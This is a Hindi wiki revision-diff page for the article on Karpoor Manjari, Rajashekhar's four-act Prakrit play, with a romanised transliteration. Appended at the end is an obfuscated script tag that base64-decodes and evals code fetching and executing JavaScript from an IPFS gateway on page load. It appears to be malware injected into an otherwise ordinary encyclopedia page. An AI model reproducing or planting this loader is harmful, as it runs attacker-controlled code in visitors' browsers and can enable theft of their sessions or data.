Difference between revisions of "कर्पूर मञ्जरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''कर्पूर मञ्जरी''' में चार अंक हैं तथा यह केवल [[प्राकृत भाषा]] में रचित होने के कारण 'राट्टक' कहा जाता है।  
*कर्पूर मञ्जरी में चार अंक हैं तथा यह केवल [[प्राकृत भाषा]] में रचित होने के कारण 'राट्टक' कहा जाता है।  
 
 
*यह [[राजशेखर]] की सर्वोत्कृष्ट रचना है।  
 
*यह [[राजशेखर]] की सर्वोत्कृष्ट रचना है।  
 
*कहा जाता है कि इसकी रचना राजशेखर ने अपनी पत्नी 'अवंतिसुन्दरी' के आग्रह पर की थी।
 
*कहा जाता है कि इसकी रचना राजशेखर ने अपनी पत्नी 'अवंतिसुन्दरी' के आग्रह पर की थी।
 
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{संस्कृत साहित्यकार}} {{महाकाव्य}}{{संस्कृत साहित्य2}}{{भारत के कवि}}
+
{{संस्कृत साहित्य2}}
[[Category:कवि]]
 
 
[[Category:साहित्य कोश]]
 
[[Category:साहित्य कोश]]
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]]
+
[[Category:संस्कृत साहित्य]]
[[Category:प्रसिद्ध व्यक्तित्व]]
 
[[Category:संस्कृत साहित्यकार]]
 
[[Category:साहित्यकार]]
 
[[Category:नाटककार]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__
''तिरछा पाठ''
 

Latest revision as of 14:17, 10 September 2012

karpoor manjari mean char aank haian tatha yah keval prakrit bhasha mean rachit hone ke karan 'rattak' kaha jata hai.

  • yah rajashekhar ki sarvotkrisht rachana hai.
  • kaha jata hai ki isaki rachana rajashekhar ne apani patni 'avantisundari' ke agrah par ki thi.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>